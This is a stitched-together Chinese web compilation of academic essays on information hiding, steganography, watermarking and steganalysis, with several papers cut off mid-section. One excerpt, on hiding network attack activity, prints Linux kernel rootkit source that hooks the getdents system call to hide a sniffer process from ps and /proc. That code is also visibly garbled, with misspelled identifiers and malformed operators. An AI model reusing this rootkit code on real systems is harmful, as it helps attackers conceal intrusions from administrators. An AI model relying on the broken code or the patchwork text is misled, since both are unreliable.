绪论:写作既是个人情感的抒发,也是对学术真理的探索,欢迎阅读由发表云整理的11篇隐藏技术范文,希望它们能为您的写作提供参考和启发。
多媒体技术和通信技术带来极大方便,但数字化的多媒体信息很容易受到非法访问、篡改、复制和传播,给人们的生产生活及生命财产带来隐患。魔高一尺道高一丈,信息隐藏技术应运而生。
一、信息隐藏技术及其特征
信息隐藏技术利用载体数据的冗余性以及人的感官局限性,将一个特定信息隐藏在另外一个被称为载体的信息中。信息隐藏技术融合电子工程、计算机科学、信号处理、通信、多媒体技术等多学科,是新兴技术体系。信息隐藏所用载体可以是文本、图像、音频、视频,甚至可以是某个信道或某套编码体制。信息能够隐藏在载体中,载体数据本身具有很大的冗余性,未压缩的多媒体信息编码效率是很低,将某些信息嵌入到该载体信息中进行秘密传送完全可行,不会影响多媒体信息本身的传送和使用;人的感觉器官对于所接收信息都有一定掩蔽效应,如人耳对不同频段声音敏感程度不同,可将信息隐藏到载体中而不被觉察。
信息隐藏技术的特征明显:不可察觉性,嵌入信息后,要求不会引起载体发生可感知变化;不可检测性,嵌入隐藏信息后,计算机不能发现和检测;安全性,嵌入信息后,必须拥有相关信息才能够提取所嵌入内容;纯正性,提取操作时,即便载密文件受到损压缩、解压缩、滤波、转换等扰动,也能提取隐藏信息;稳定性,隐藏信息能“永久”存在;安全性,第三方在不知道隐藏算法和隐藏密钥情况下,不能获取信息相关数据。信息隐藏技术按载体分为,基于文本、图像、音频、视频、超文本、网络层、图形等媒体的信息隐藏技术;按嵌入域分为基于空域(或时域)和变换域的隐藏技术;按嵌入策略分为替换调制、模式调制和扩频叠加调制等技术;按提取要求分为盲隐藏技术和非盲隐藏技术;按作用分为隐蔽通信和数字水印技术;按密钥分为无密钥隐藏和有密钥隐藏。
二、信息隐藏技术的研究及演进
信息安全事关个人利益,也事关国家安全、社会稳定以及经济发展,各国政府无不重视信息和网络安全。密码技术一直是保障信息安全的重要手段,但这并不能解决问题。截获者发现网络文件加密,往往会引起注意,并激发其破解欲望,即使不能成功破解,也能轻易拦截并破坏秘密信息,干扰通信进行。针对密码技术的局限性,上世纪90年代国际上出现了信息隐藏技术(InformationHiding)。
现代信息隐藏研究主要集中在静态图像领域,目前信息隐藏所用载体已扩展到文字、图像、声音及视频等领域。在全球信息化、数字化迅猛发展时代背景下,对知识产权保护、隐密通信等需求激发了对信息隐藏技术的研究热潮。国际上研究信息隐藏的机构主要有剑桥大学、麻省理工学院、NEC美国研究所、IBM研究中心等,已提出了一些优秀隐藏算法。我国于1999年在何德全、周仲义、蔡吉人等三位院士大力倡导下召开了第一届信息隐藏学术研讨会,我国对信息隐藏的研究也取得重要成果。目前在信息隐藏中无论是数字水印还是隐密通信,都得到越来越广泛应用。应用领域不断扩大,从最初静态图片发展到文本、音频、视频、电脑文件、流媒体、网页及网络传输中的数据包,甚至是无线通信领域中的语音通信和手机彩信等领域。我国对信息隐藏的研究取得了很多成果,基本与世界水平保持一致。如今信息隐藏研究已出现百花齐放、百家争鸣局面。
三、信息隐藏技术的应用
随着信息技术飞速发展,人类利用的信息越来越丰富,通信技术发展使人们能够方便、快捷、灵活地使用文本、语音、图像与视频等多种方式通信;各种数字化信息处理技术使得网络中传输任何类型的文件(如文本、图像、音频和视频等)都可被数字化,极大方便了对各种信息数据压缩、存储、复制、处理和利用。
信息隐藏技术主要有隐写术和数字水印。目前,信息隐藏技术的应用主要在以下方面:一是隐密通信。通过隐写术将秘密信息嵌入在公开媒体文件中传播消息。早期的隐密通信,接收方和发送方甚至不必交换电子邮件,直接交互文件或登录特定计算机和账户。随着网络及通信技术发展,隐密通信所用通信方式从简单数据文件交互到互联网以及无线通信领域。二是版权保护。通过数字水印技术在媒体文件中嵌入特定数字标识或签名,标识媒体文件所有权和版权信息等。三是数据完整性保护。防护篡改、完整性保护中所采用的数字水印为易损水印或脆弱水印,任何对媒体文件修改都会从隐藏数据中反映出来。四是印刷品防伪。印刷品印刷之前嵌入一定标识信息,印刷后作品可经过扫描再次输入计算机,通过特定水印提取和鉴别方法来鉴别作品真伪。五是拷贝控制。控制媒体文件拷贝次数,防止大规模盗版或非法复制。
信息隐藏技术重点运用领域是移动通信领域。移动通信网络方便快捷,在军事和商业通信中广泛应用。移动通信领域多媒体短信将文本、图片、音频、视频等组合成多媒体消息进行发送。移动通信领域中多媒体短信以其特有的直观性、生动性和集成性,面市以来得到广泛关注。多媒体短信即彩信的最大特色是支持多媒体功能,可将不同的媒体,如文本、图片、音频、视频等组合在一起进行发送。彩信标准并没有对彩信所支持的文件格式给出具体限制,理论上只要在封装打包时为彩信所包含的各媒体文件设置好适当类型参数即可;但实际上具体的彩信所支持媒体格式还是有限的,这主要与手机终端彩信软件和MMSC支持传送媒体格式有关。随着3G普及以及手机终端行业发展,彩信所支持的媒体文件格式将更丰富多样,为信息隐藏技术在彩信中的应用提供了更为广阔的空间。
【参考文献】
中图分类号:TP309 文献标识码:A文章编号:1007-9599 (2011) 14-0000-01
Information Hiding Technology and Implementation Methods
Wang Hao,Yang Bo,Zhang Jian
(Shandong Provincial Military Area Command,Jinan250099,China)
Abstract:Today,the information technology and the computer technology is highly developed,the combination of digital information and the ancient steganography make the digital hiding technology become a new technology,which provides a new way to explore the non-cryptographic security communication.
Keywords:Information hiding technology;Implementation
信息隐藏的思想起源于隐写术,它是一种将秘密信息隐藏于另一个非机密文件内容之中,在传输、存储过程中不被察觉和发现,接收者获得隐藏对象后,按照约定规则还原秘密信息的技术。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于自然环境中,免于被天敌发现而遭受攻击。
信息隐藏技术可以追溯到远古时代,方法从音符、咒语到五花八门的隐写术,但隐写术发展一直比较缓慢,没有成为一门独立的学科,人们对于信息保密更多的是采用密码技术。直到信息技术和计算机技术高度发达的今天,数字化信息与隐写术相结合,为古老的隐写术注入了新的活力,使得数字化信息隐藏技术成为一门全新的技术,为探索非密码的通信安全提供了新途径。
一、信息隐藏的基本方式
(一)传输隐藏。在视频通信系统中隐藏信息,利用视频通信压缩编码中可利用的资源,在确保不使视频信号质量严重下降的前提下,嵌入压缩的话音编码,形成秘密通信信道。同时数据通信中的IP包和TCP包,均有未使用的保留空间,可用来传输隐藏信息。另外,IP包的时间戳也可传送1个比特的数据。
(二)载体隐藏。在文本文件、图像文件及可执行文件中插入秘密信息,可实现信息隐藏。利用话音信号的自然冗余性,将秘密信息直接编码到文件内容中去,或将其编码到文本格式中,形成以文本为载体的信息隐藏。将秘密信息插入图像文件中对人的视觉系统不敏感的比特位,在不影响图像质量的前提下实现信息隐藏。利用可执行文件中的冗余信息,加载秘密信息。
(三)存储隐藏。利用计算机系统中保留或未使用的空间保存秘密信息,为隐藏信息提供另外一种方式,通过创建隐藏分区、使用操作系统分配给文件但未使用的空间来隐藏信息。同一个计算机系统中不同安全级别的两台主机,根据预先约定的规则,通过存储特定数据也可传递信息。级别高的主机在特定区域存储不同大小、不同名称的文件,级别低的主机虽不能访问数据,但可从文件列表获取所要的信息。
二、信息隐藏的实现方法
(一)基于替换的信息隐藏方法。基于替换的信息隐藏,就是用秘密信息比特替换掉伪装载体中不重要的比特,实现对秘密信息的隐藏。如果这种嵌入的信息在传输过程中不被察觉,接收者就可从秘密信息嵌入的位置提取出秘密信息。常用的替换方法:一是最低比特位替换。就是利用图像位平面最低几位比特对人的视觉系统不敏感的特性,将这些比特替换成秘密信息的相应比特。利用此种方法可在伪装载体中隐藏大量秘密信息而不被察觉。二是伪随机置换。就是把秘密信息比特近似随机地分散在整个载体中。用伪随机数发生器产生索引序列,并在以此为索引的载体元素中插入秘密信息。利用此种方法插入比特的顺序无规律可找,因而增加了被攻击的复杂度。三是载体区域和奇偶校验位替换。将载体伪随机地分成若干个不相接的载体区域,在每个区域的奇偶校验位上嵌入一个信息比特,若奇偶校验位与信息比特不匹配,则区域中所有值最低一个比特位反转,使二者相等,在译码过程中计算出所有区域的奇偶校验位,排列起来重构信息。四是量化和抖动替换。利用数字图像的抖动和量化处理过程插入秘密信息。运用预测编码的量化误差,通过调整差分信号Δi来传送秘密信息。五是OSI网络协议帧结构替换。就是将秘密信息插入TCP/IP包中未使用的空间,形成一个秘密的通信信道。
中图分类号:F407.63 文献标识码:A 文章编号:
信息隐藏技术是现代人们保障信息安全的研究焦点,涉及很多领域,是人体感知能力、信息技术;密码技术等学科的很好的应用,其实现的主要载体是计算机多媒体技术,本文中作简单分析。
1信息隐藏技术的原理和特征
1.1信息隐藏与信息加密
信息加密是利用密码学技术将机密文件进行加密编码,把明文变换成密文后,通过公开信道送到接收者手中(见图1)。由于经过加密处理的密文是一组乱码,当监视通信信道的攻击者发现并截获到乱码后,就可以利用已有的各种攻击方法对密文进行破译。这种方式虽然不易被解密,但通信易被第三方察觉,一定程度上向攻击者明确提示了重要信息的存在,所以容易引起攻击者的注意,进而遭受到干扰和攻击,导致密文通信失败。同时,即使攻击者无法对密文进行破译,也可在破译失败后将该信息进行破坏,使得合法的接收者也无法获取密文。
图1 信息加密过程示意图
信息隐藏也称“信息隐匿”,是信息安全研究领域中的一门新兴的交叉学科,也是当前信息安全领域国内外各机构研究的热点方向。信息隐藏与信息加密的目的相同,都是为了保护秘密信息的存储和传输,使之免遭第三方的破坏和攻击,但两者之间具有显著的区别。信息隐藏技术是将机密信息秘密隐藏于另一公开信息(载体、宿主、掩体对象)中,即将秘密信息(嵌入对象)嵌入到另一表面看起来普通的信息载体中,然后通过该公开信息(隐藏对象)的传输来传递秘密信息(见图2)。第三方很难从公开信息中判断机密信息是否存在,即无法直观地判断所监视的信息中是否含有秘密信息。这种方式使含有隐匿信息的宿主信息不会引起第三方的注意和怀疑,降低了机密信息的截获率,从根本上保证了机密信息的安全。其关键技术主要是在确保宿主文件格式、质量和大小不变的前提下,将密文保存在该宿主文件中,且能对密文实现无损还原。
图2 信息隐藏过程示意图
1.2信息隐藏技术的原理
信息隐藏系统(典型模型见图3)包括一个嵌入过程和一个提取过程。在嵌入和提取过程中通常都会使用一个秘密信息来对其进行控制,使得只有合法授权用户才能对其进行操作,这个秘密信息被称为隐藏密钥,隐藏密钥在嵌入过程中称为嵌入密钥,在提取过程中称为提取密钥。
在嵌入过程中,信息隐藏者利用嵌入密钥,将密文添加到载体中,生成隐蔽载体。隐蔽载体在传输过程中有可能被隐藏分析者截获并进行处理。在提取过程中,提取者利用提取密钥从接收到的、可能经过修改的隐蔽载体中恢复出密文。在密文提取时,根据隐藏算法的不同,有可能需要载体,也可能不需要。
图3 信息隐藏系统的典型模型
信息隐藏可在不改变原有通信设备的基础上实现,只需要在原通信系统的收发设备,增加信息隐藏/隐藏信息提取模块,便能够在完成信息隐蔽传送的同时,保持系统原有的通信功能不受其影响(见图4)。首先获取密文信息,为进一步提高安全性,可结合信息加密技术对密文信息进行预处理,得到加密信息,之后可采取交织、纠错等编码措施。接下来,获取载体信息,如音频、图像、文本等原始宿主信息;如果采用的是变换域信息隐藏算法,则需要对载体信息进行相应的域变换;同时,为使接收端能对隐藏信息进行准确的盲检测,可在载体信息中加入同步信号。之后,便可将秘密信息嵌入到载体信息中、完成变换域的反变换,得到隐蔽载体。最后,由发送端将隐含密文信息的隐蔽载体通过公共信道进行传送。
图4 信息隐藏模型示意图
接收端获得隐蔽载体后,对其进行相应的域变换、信道解码和解密后,就获取了所嵌入的密文信息。
1.3信息隐藏技术的分类及特征
信息隐藏技术一般具有如下分类方法:
(1)按载体类型分类。根据信息隐藏所采用载体的不同,信息隐藏技术可分为文本信息隐藏、音频信息隐藏、图像信息隐藏、视频信息隐藏等。音频信息和图像信息隐藏是信息隐藏的重要分支。
(2)按密钥分类。若嵌入和提取采用相同密钥,则称其为对称隐藏算法,否则称为公钥隐藏算法。
(3)按嵌入域分类。主要可分为空域(或时域)方法及变换域方法。
(4)按提取的要求分类。若在提取隐藏信息时不需要利用原始载体,则称为盲隐藏;否则称为非盲隐藏。
(5)按保护对象分类。主要可分为隐写术和水印技术(见图5)。
图5 按保护对象分类
隐写术的目的是在不引起任何怀疑的情况下秘密传送消息,信息隐藏技术在通信中的应用主要是指隐写术。数字水印是指嵌在数字产品中的数字信号,可以是图像、文字、符号、数字等一切可以作为标识和标记的信息,其目的是进行版权保护、所有权证明、指纹(追踪多份拷贝)和完整性保护等。匿名通信就是寻找各种途径来隐藏通信的主体,即信息的发送者和接收者。
2信息隐藏技术在电子通信中的应用前景
当前,我国在信息安全的应用方法和研究领域方面,大多还是采用传统意义下的信息加密技术,例如用hash函数,伪随机序列等密码学技术等,这种信息安全模式存在两大弊端:一是信息安全无法保障,不能保证加密的信息不被破译;二是耗资巨大,现代先进信息安全技术往往对设备要求较高,这在很大程度上增加了对基础工业的投入。因此,对信息隐藏新技术与新模式的研究和发展,在信息安全领域具有很大的潜在价值。
2.1将被动保密变主动隐藏。新型信息隐藏技术使需要保护的消息由“看不懂”变为“看不见”;将传统的“让攻击方解密不了”的信息加密理念提升为“让攻击方想象不到”的层面,从而使通信中传统的保密、预防的被动模式,转型到既安全又能够迷惑第三方的主动模式。
2.2现有传输条件下的低信息截获率。采用先进的信息与信号处理技术,以及多级包装式信息隐藏新模式,可在很大程度上降低现有传输条件下秘密信息的截获率。举例而言,假如需要传输秘密文本信息A,我们将该文本A隐藏于另一文本信息B中,之后,我们将该文本B隐藏于图片C中,再将图片C隐藏于图片D中,最后将图片D隐藏于普通话音中。即文本A(隐藏于)文本B(隐藏于)图片C(隐藏于)图片D(隐藏于)普通话音。通过上述方式,一是攻击方不会想到秘密信息正在以一种特殊多级包装形式进行传输,也就没有试图解密的意图;二是即使前几层包装信息(B、C、D)被破译,攻击方自以为解密成功,从而放弃继续解密的意图,却不知道真正的秘密信息(文本A)并没有被解密出来。
3结语
目前信息隐藏技术是保障信息安全的关键技术,在国内外都得到了广泛的应用,并且都取得了一定成绩。信息隐藏技术作为一种重要的信息安全技术,潜在的价值是无法估量的, 特别是在迫切需要解决的版权保护等方面, 可以说是根本无法被代替的, 相信其必将在未来的信息安全体系中发挥越来越重要的作用。
参考文献:
[1]王丽娜等.信息隐藏技术与应用[M].武汉:武汉大学出版社,2009.
[2]杨波.信息隐藏技术及其应用[M].北京:科学出版社,2002.
[3]吴志军等.语音隐藏的研究及实现[J].通信学报,2002,23(8):99-104.
关键词:
电子信息;隐藏技术
在利用互联网传送数据、文件的时候,极有可能会出现数据、文件被攻击、窃取等问题,尤其那些关于国家安全、经济发展、个人隐私的资料,一旦被非法分子获取,极有可能会影响国家的经济以及个人的安危。为了有效的解决这些问题,人们引入了网络加密技术。但是加密技术将文件、数据变成了乱码,更易激发某些人“挑战权威”的欲望。为了解决新问题,人们又引进了信息隐藏技术,将机密文件“伪装”成普通文件,这样就能有效的混淆人们的视听,提升网络传输的安全性。
一、电子信息隐藏技术
电子信息隐藏与信息伪装是同一个概念,都是利用有效手段将机密信息隐藏于另一个非机密信息之中,用以混淆“有心人”视听的一种电子信息技术。隐藏技术的载体类型非常的多样,可以是图像、声音、视频还可以是文档,因此,不易被一般人辨识,即便某些人发现了隐藏信息,也难以提取信息,这就使得机密的信息、文件得以安全传输。因传统的加密技术思想和方法具备优势,所以现阶段人们所使用的信息隐藏技术是在有所保留的同时进行了改进。按照处理对象的不同信息隐藏技术可以被分为数字水印技术、叠像技术以及替声技术等。其中,叠像技术是一种将信息隐藏在载体中进行安全传输的技术。数字水印技术可以在开放的网络环境下保护版权,可以识别与版权相关各方的信息,并将这些信息转化成“隐藏信息”嵌入图像、音频、视频等,以实现确认所有权和信息跟踪目标。替声技术按照声音包含的内容进行分类,可以通过处理声音信息,改变原声的对象、内容等隐藏真正的声音信息。
二、电子信息隐藏技术的特征分析
与传统的信息相比,安全技术电子信息隐藏技术具备六个明显的特征优势:第一,安全性。能够有效的抗击强攻击能力,即便是遭受了一定的人为攻击,隐藏信息也可以最大限度的保存,而不受破坏。第二,隐蔽性。因为电子信息隐藏技术将需要传递的信息、资料隐藏于普通载体之中,信息对象的外部特征得以伪装,也更难以被不法分子察觉、阻拦。第三,不可测性。因为隐蔽载体与原始载体存在某些潜在的、不容人轻易窥见的关联性,即使被人拦截,想要正确的提取,却也存在较大的困难。即便是能够提取,也需要消耗大量的时间,这也就为信息、资料拥有者采取有效措施提供了时间。第四,不可见性。电子信息隐藏技术利用人类视听觉属藏处理资料、信息,目标资料的内容、质量并没有改变,但却无法被人为的看见或是听见。第五,不可变性。即便是隐藏载体发生变化,比较常见的变化类型包括诸如增强、滤波、有损压缩、重采样等一系列传输过程中的载体信号处理,诸如旋转、平移、分割、缩放等一般的几何变换以及恶意攻击等,目标文件所包含的信息也不会丢失。第六,自恢复性。虽然电子信息隐藏技术具备不可变性,但是这种性质并不能保证信息百分之百的绝对的“不可变”,因此,自恢复性有效的解决了操作损毁、变换文件的问题,只要损毁的标文件还残留部分的数据,即使没有宿主信号,也可以采取有效的措施,对目标文件进行恢复。
三、电子信息隐藏技术的应用状况
(一)数据保密方面的应用互联网的使用方便了人们的生活、学习,人们利用互联网进行资料、数据的传输。然而,随着互联网技术的普及,很多不法之徒也将目光转向了互联网方向,非授权用户利用不法手段截获、使用相关资料,导致网络不安全问题发生,严重的损害信息、资料所有者的权益。现阶段,经济全球化发展迅猛,互联网传输资料所涉及的面也更加的广泛,政治、军事、商业、金融、个人隐私等的泄漏将会带来的不良结果,谁也无法妄下断言。因此,信息隐藏是及其重要且必要的。信息隐藏技术可以保护网上信息交流的安全系,还可以满足一些人隐藏存储私人的、“不愿为外人道”的个人隐私。
(二)数据完整性鉴定方面的应用现阶段最常使用的信息隐藏技术包括数字水印技术、叠像技术以及替声技术,通过分析这三种技术的实际应用情况,不难发现数字水印技术存在缺陷,一旦保护媒体被篡改,数字水印技术所隐藏的目标文件将会被破坏、暴露,进而被不法之徒识别。数字水印技术的使用在数字票据中比较常见。由于隐藏的水印经打印后仍可保留,因此在鉴别数字票据真伪的时候,可以利用再扫描的方法使水印变为数字形式,提取防伪水印。数据完整性鉴定包括鉴定信号真伪、鉴定信号的完整性、指出信号差别以及资料传输过程有无发生篡改、丢失等情况。数据完整性鉴定可以准确的鉴定获知信号的真实性,大幅度的降低虚假、错误信息的使用。在具体应用的时候主要包括如下两个步骤:首先,利用数据库管理系统保证数据完整、准确的输入和储存。其次,充分考虑实际情况,选择最合适的数据校验方式对传输数据进行校验检查。
四、结束语
综上所述,信息隐藏技术具备难以估量的应用价值以及广阔的应用前景。但是作为一种有效的新型信息安全技术,信息隐藏技术的体系以及技术等都还有待加强。相关人士应充分的认识现阶段的信息隐藏技术的优势与劣势,深入的研究信息隐藏技术,进而使信息隐藏技术更好的发挥作用。
参考文献:
[1]陈素霞,陈亚锋.浅谈信息隐藏技术及其应用[J].沿海企业与科技,2010(03).
中图分类号:TP393文献标识码:A文章编号:1009-3044(2007)04-10961-03
1 引言
攻击活动是一系列连续操作,若攻击时一不小心露出马脚,所有前面的攻击就会付诸东流,甚至会“引火烧身”。基于这样的认识,精明的网络攻击者特别注意隐藏攻击活动。
隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论网络攻击活动中文件、进程、网络连接及通道的高级隐藏技术,这些技术有的已经被广泛应用到各种后门或安全检测程序之中,而有一些则刚刚起步,仍然处在讨论阶段,应用很少。
2 进程活动隐藏技术
攻击者在目标系统进行攻击活动时,产生攻击进程,如果不将这些攻击进程隐藏在系统中,就会被网络安全管理人员发现。例如,攻击者注册到某台Linux主机时,系统管理人员使用ps-ef | grep in.telnetd命令就可以察觉。攻击者可以通过修改系统的进程管理模块,替换进程管理核心模块,控制进程的显示,主要是netstat、ps等命令。下面给出Linux系统下隐藏进程源程序的例子:
extern void* sys_call_table[];
/*隐藏进程名称*/
char mtroj[]="my_evil_sniffer";
int (*orig_getdnts)(unsigned int fd,struct dirent *dirp,unsigned int coumt);
/*convert a string to number*/
int myatoi(char *str)
{ int res=0;
int mul=1;
char *ptr;
for(ptr=str+strlen(str)-1;ptr>=str;ptr--) {
if(*ptr'9')
return(-1);
res+=(*ptr-'0') *mul;
mul*=10;}
return (res);}
/*从task structure中获取进程号*/
struct task_struct *get_task(pid_t pid)
{ struct task_struck *p=current;
do { if (p->pid==pid)
returnp;
p=p->next_task; }
while (p!=current);
return NULL;}
/*从task structure获取进程名称*/
static inline char *task_name(struct task_struct *p,char *buf)
{ int i; char *name;
name=p->comm;
i=sizeof(p->comm);
do {unsigned char c=*name;
name++; i--;
*buf=c;
if (!c);
break;
if (c=='\\') {
buf[1]=c; buf+=2;
continue; }
if (c= ='\n') {
buf[0]='\\';
buf[1]='n'; buf+=2;
continue; }
buf++;}
while (i);
*buf=’\n’;
return buf+1;}
/*确认需要隐藏的进程*/
int invisible (pid_t pid)
{struct task_struct *task=get_task (pid);
char *buffer;
if (task) {
buffer=kmalloc (200,GFP_KERNEL);
memset (buffer,0,200);
task_name (task,buffer);
if (strstr (buffer, (char *) &mtroj)) {
kfree (buffer);
return 1; }
}return 0;}
int hacked_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)
{unsigned int tmp,n;
int t,proc=0;
struct inode *dinode;
struct dirent dirp2,dirp3;
tmp=(*orig_getdents) (fd,dirp,count);
#idef _LINUX_DCACHE_H
dinode=current->files->fd[fd]->d_inode;
#else
dinode=current->files->f_inode;
#endif
if (dinode->i_ino= =PROC_ROOT_INO && !MAJOR (dinode->I_dev) &&
MINOR (dinode->I_dev) = =1)
proc=1;
if (tmp>0) {
dirp2= (struct dirent *) kmalloc (tmp, GFP_KERNEL);
memcpy_fromfs( dirp2,dirp,tmp);
dirp3=dirp2;t=tmp;
while (t>0) {
n=dirp3->d_reclen;
t-=n;
if ((proc && invisble (myatoi (dirp3->d_name)))) {
if (t!=0)
memmove (dirp3, (char *)dirp3+dirp3->d_reclen,t);
else
dirp3->d_off=1024;
tmp-=n;}
if (t!=0)
dirp3= (struct dirent *) ((char *) dirp3+dirp3->d_reclen);}
memcpy_tofs (dirp,dirp2,tmp);
kfree (dirp2);}
return tmp;
int init_module (void)/*module setup*/
{orig_getdents=sys_call_table[SYS_getdents];
sys_call_table[SYS_getdents]=hacked_getdents;return 0;}
void cleanup_module (void)/*module shutdown*/
中图分类号:TN918.6
当今社会已经进入到了一体化的网络时代,网络成为最重要的传媒手段,各种信息都通过网络进行传播,包括个人信息、军事信息、私密信息等,如何在这种开放的环境中,最大程度保证信息的安全,是当下网络技术的热点话题。但是随着信息技术的发展,计算机处理信息的能力也有所增强,传统的秘钥不再能保证信息的绝对安全,因此数据的隐藏技术成为了热点,也是保护信息的重要手段。
1 信息隐藏技术概述
1.1 信息隐藏技术基本内涵。信息隐藏技术主要是将秘密信息隐藏在普通的文件中,并通过数字化的信号进行处理,这样通过对于用户的视觉冗余来进行隐藏,最大程度保证信息的安全性。隐藏后的信息会使媒体的搜索目标变小,甚至无法发现,这样秘密的信息和文件便可以通过这种形式来保护信息。信息隐藏技术目前应用比较广广泛,主要包括以下内容。首先是隐藏术,主要内容是进行秘密形式的通信,并且将信息藏匿与其他的普通信息中,信息隐藏主要是以第三方信息保护的形式,便于将信息传输到目的客户端。第二是数字水印,可以是作者的序列号、公司的标识等,主要是能证明被保护的信息或者文件可以被证明以及查询侵权的一种途径。第三是数据嵌入。在不同形式的信息中,技术模式吸取了隐藏术与水印的优势,并通过嵌入的方式对于秘密信息进行保护。第四是指纹与标签,是水印的一种特殊用途,水印的每个特定的信息可以进行信息的拷贝。
1.2 信息隐藏技术的特点。信息隐藏技术与传统的信息加密不同,基本目的并不是限制文件资料的提取与保存,而是将数据信息隐藏最小化。除此之外,信息隐藏技术还要充分考虑到信息在通过多种程序处理之后,仍然具备可以运行操作的性质,不会被破坏基础属性,因此信息隐藏技术需要具备以下特点。
(1)隐蔽性。信息隐藏的首要特性便是隐蔽性,主要指的是信息在嵌入之后,最大程度避免信息质量的改变,同时也能掩饰信息的基本特征,在传输过程中不会引起察觉,在视觉方面可以很好保护信息不被发现,保证原始信息的一致性。例如拥有相同的统计分布,这样变会混淆拦截者的信息判断能力,保证信息的安全;(2)安全性。隐藏技术需要具备较强的安全性能,可以有效避免黑客的侵袭与共计,最大程度保护隐藏信息的安全;(3)恢复性。被保护的信息会经过多重程序进行处理与改变,因此特性上会发生一定改变,如果原始信息受到了破坏,那么隐藏技术需要通过保存下来的信息来恢复原来的文件,这样保证传输的信息准确性。
2 信息隐藏的技术方法
2.1 替换技术。人的感官系统对于一些细小的变化比较敏感,因此替换技术的核心就在于改变这些被保护文件中秘密的细节部分,并不被非法用户注意。这种形式并不会影响被保护信息的性质,而且可以对于被保护信息进行编码程序,当前应用比较广泛的替换技术包括最低比例的一换技术、随机的替换技术、特定区域替换技术等等。
2.2 变换技术。绝大多数的信息隐藏技术都是通过正交变换域来实现的,由此可见变换技术核心是通过扩频技术和密码学原理,将被保护的信息嵌入到普通信息的变换域中,同时利用算法来进行信息的提取,转换为隐蔽的形式。这种变换技术充分利用了人体感官对于空间频率差异的敏感程度,进而改变被保护信息的性质,确保信息不被察觉。
2.3 扩频技术。被保护信息在进行隐藏的过程中,有可能会导致信息的破坏,甚至信息的消除,因此为了保护信息的原始特性,可以利用重复编码的形式来进行扩频。在被保护的信息中插入一个参数,确保信息在处理后仍然可以进行扩频,通常选择高速率的随机码来进行发送,而且这种信息数据自身的信号也可以完成扩展。
3 信息隐藏技术的应用
3.1 数字水印技术的应用。数字水印技术是信息隐藏技术最重要的一种形式,主要是通过在多媒体中插入不可感知的信息,因而实现对于信息的保护以及对于操作的记录、跟踪。
(1)版权保护。在数字水印技术的应用中,版权保护是最重要的内容,主要是将重要的版权信息嵌入到图像、音频、文本中,目的是进行区分、标识以及解释版权。在一些逐步实现数字化的行业,例如数字图书馆、数字新闻等,很多信息容易受到篡改,知识产权保护能力比较差,因此通过信息隐藏技术中的水印技术,既可以最大程度保持作品的原始性,又难以被非法用户进行篡改,通过特殊标识的嵌入,可以是数字、文字、图标,与原始文件的结合,不会严重破坏数据的功能,还能具备一定的商用价值。这种水印通常情况下是不可见的,特别是在涉及知识产权纠纷中,可以通过特定秘钥提取出水印,进而实现保护自主知识产权的目的;(2)指纹识别。通过数字水印技术可以在文件中标注出授权的单位以及特殊名称,通过文件的原始性保证在特殊处理之后以及用户的接受、存储之后,文件特性不会发生改变。因此如果在被保护文件通过隐藏技术传输之后,便可以标注的信息追踪到文件的相关责任人,这样对于调查、规则也有据可循。这种指纹识别的技术实质是一种跟踪功能,特别是在数字产品的应用中,版权人可以将不同用户的序列号进行处理,嵌入到这些合法的拷贝中,这样在出售合法的拷贝的时候,可以与嵌入的信息相对照,如果是非法的、未经授权的拷贝产品,版权人便可以通过指纹来追踪,进而找寻到泄密者。
3.2 隐藏通信技术的应用。隐藏通信技术主要是将被保护的秘密的信息、文件隐匿于某些普通的公开文件中,进而保证在传输过程中秘密信息的安全性。以隐藏载体形式的不同,可以划分为文本的隐藏、语音的隐藏和视频的隐藏等。在实践中主要应用于数据的保密,例如在电子商务中时常会涉及到一些重要的信息,如商业机密、秘密协议、金融交易等,这些重要的数据信息一旦泄露可能会为个人或者企业带来损失,因此防止非法用户中途拦截这些数据,便可以采用隐藏通信技术,将信息以隐藏的形式进行传输,有效避免非法用户的拦截,最大程度保证信息安全。
4 结束语
信息隐藏技术方式多样,应用灵活,在未来的信息保护中将会得到广泛应用,但是这种技术手段目前还在发展阶段,在理论体系方面还在不断趋于成熟与完善,特别是在现实应用中还有待于进一步优化,存在的问题亟待解决。例如数字水印模型的构建、抗攻击性的提升等等,在算法上也在逐步完善。信息隐藏技术作为一把双刃剑,在应用方面也要利用特征优势,更好地为当下的信息传输做贡献。
参考文献:
[1]戴跃伟.信息隐藏技术的理论及应用研究[D].南京理工大学,2012.
[2]刘洁.信息隐藏技术及应用[J].现代情报,2011.
[3]尹兰.基于文本的信息隐藏技术的研究[D].贵州大学,2007.
[4]高真.密文图像中的可逆信息隐藏算法研究[D].重庆大学,2013.
[5]特列克别克・米沙.一种新的信息隐藏算法的设计研究[D].电子科技大学,2013.
信息隐藏的概念在几千年前就已经存在,主要是对于想要传递的文字、图像、声音等信息进行隐藏工作。互联网技术发展迅速的今天,如何在信息的传输过程中保证信息安全性,并且保证图像等信息可以被接收人正常识别,已经成为研究的重要课题。
1 基于图像的信息隐藏检测技术
1.1 信息隐藏检测技术
1.1.1 攻击技术。攻击技术是指,认为的对隐藏图像信息进行攻击破坏,可以简单有效地使隐藏图像信息被损坏,使之无法被识别。这种方法对于破坏传输信息是极为有效地方法,要谨慎使用,很容易造成信息彻底被破坏掉。
1.1.2 检测技术要判断是否有隐藏图像信息,对信息进行检测是判断其是否存在的有效办法,既能保证信息完整性,有可以对隐藏信息进行有效识别。检测是对于隐藏的图像信息进行分析的首要步骤。
1.1.3 破解技术在发现隐层图像信息之后,要想得到隐藏的图像信息,就要应用破解技术对加密技术进行破解,难度最大,也是整个分析过程的核心工作。
1.2 信息隐藏检测技术
信息隐藏检测技术依照研究的客体不同可以分为两类,分别是:
a. 对比检测技术。这种技术主要是讲原始信息载体和隐藏后的信息载体进行对比,分析两者间像素的关联性,来实现隐藏信息检测。此种检测方式相对简单,但是由于原始载体获取不易,所以使用效果并不能理想。
b. 盲检测技术。这种技术不需要获取原始信息载体,主要是通过对于现有隐藏信息载体的自然数图像特征进行分析,判断其信息是都进行了隐藏,虽然这种技术对于技术水平的要求更高,但是应用效果也会更好。
信息隐藏检测技术依照研究角度不同还可以分为另外两种技术,分别是:
a. 时控域检测方法。这种检测方式是依据信息在时控域的嵌入方式不用来检测信息时候被隐藏的。这种检测方法在应用的时候检测方向单一,对于多种不同信息隐藏仅应用了一种统计方法。
